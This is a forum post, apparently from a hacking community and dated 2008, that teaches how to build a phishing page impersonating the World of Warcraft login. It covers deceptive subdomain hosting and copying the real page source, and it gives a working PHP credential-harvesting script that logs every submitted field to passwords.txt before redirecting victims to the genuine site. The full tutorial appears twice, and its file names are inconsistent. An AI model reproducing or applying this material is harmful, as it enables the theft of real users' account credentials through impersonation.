TheFreak
04-09-08, 02:03 AM
Hello everybody,
I'm new to the community. Was invited by MysteriousSoul to join your forums so I did. Figured my first post better be something that wasn't posted here. If it is, I apologize in advance.
Now the goodies...
Getting a URL with Hosting
In order to make a phisher, you need a web hosting site. There are many companies that offer free sub domains with hosting. Search Google or post some of the better ones and I'll add them to the list (Maybe)
RipWay (http://www.ripway.com/)
When setting up the sub domain URL make the url.subdomain.com something you're using it for. For example worldofwarcraft.ripway.com
Source Code
Now you need to get the source code of the website you're trying to impersonate. For example we'll use
www.worldofwarcraft.com
Now click Account Management
https://www.worldofwarcraft.com/login/login?service=https%3A%2F%2Fwww.worldofwarcraft.co m%2Faccount%2F
Do NOT enter any information in the fields but instead click Login
You should get the following error message,
" Sorry, you entered an invalid username or password. Please try again or use the links below to access your regional Account Management pages."
Right click on the page and select View Source
Press CTRL + A to select everything in that notepad that popped up with the site information
Now open Notepad and paste the selected information and save that file as login.html
Now open Notepad again and paste the following information
<?php
header ('Location: https://www.worldofwarcraft.com/login/login?service=https%3A%2F%2Fwww.worldofwarcraft.co m%2Faccount%2F ');
$handle = fopen("passwords.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
The following
https://www.worldofwarcraft.com/login/login?service=https%3A%2F%2Fwww.worldofwarcraft.co m%2Faccount%2F url is the page they will be forward to after they enter their information. Which in this case will be the World of Warcraft login page.
Save this file as "phish.php"
Go back to your login.htm file and click edit. Press CTRL+F and type in action= in the box. Keep pressing find until you find something that says action=(something that has to do with logging in). Replace that with phish.php.
Upload your login.html and your phisher.php files to your host and give out your url. Best thing to do is make an entrance page and on that have a link to your login.html page.
All information will be stored in the server under passwords.txt
I'm new to the community. Was invited by MysteriousSoul to join your forums so I did. Figured my first post better be something that wasn't posted here. If it is, I apologize in advance.
Now the goodies...
Getting a URL with Hosting
In order to make a phisher, you need a web hosting site. There are many companies that offer free sub domains with hosting. Search Google or post some of the better ones and I'll add them to the list (Maybe)
RipWay (http://www.ripway.com/)
When setting up the sub domain URL make the url.subdomain.com something you're using it for. For example worldofwarcraft.ripway.com
Source Code
Now you need to get the source code of the website you're trying to impersonate. For example we'll use
www.worldofwarcraft.com
Now click Account Management
https://www.worldofwarcraft.com/login/login?service=https%3A%2F%2Fwww.worldofwarcraft.co m%2Faccount%2F
Do NOT enter any information in the fields but instead click Login
You should get the following error message,
" Sorry, you entered an invalid username or password. Please try again or use the links below to access your regional Account Management pages."
Right click on the page and select View Source
Press CTRL + A to select everything in that notepad that popped up with the site information
Now open Notepad and paste the selected information and save that file as login.html
Now open Notepad again and paste the following information
<?php
header ('Location: https://www.worldofwarcraft.com/login/login?service=https%3A%2F%2Fwww.worldofwarcraft.co m%2Faccount%2F ');
$handle = fopen("passwords.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
The following
https://www.worldofwarcraft.com/login/login?service=https%3A%2F%2Fwww.worldofwarcraft.co m%2Faccount%2F url is the page they will be forward to after they enter their information. Which in this case will be the World of Warcraft login page.
Save this file as "phish.php"
Go back to your login.htm file and click edit. Press CTRL+F and type in action= in the box. Keep pressing find until you find something that says action=(something that has to do with logging in). Replace that with phish.php.
Upload your login.html and your phisher.php files to your host and give out your url. Best thing to do is make an entrance page and on that have a link to your login.html page.
All information will be stored in the server under passwords.txt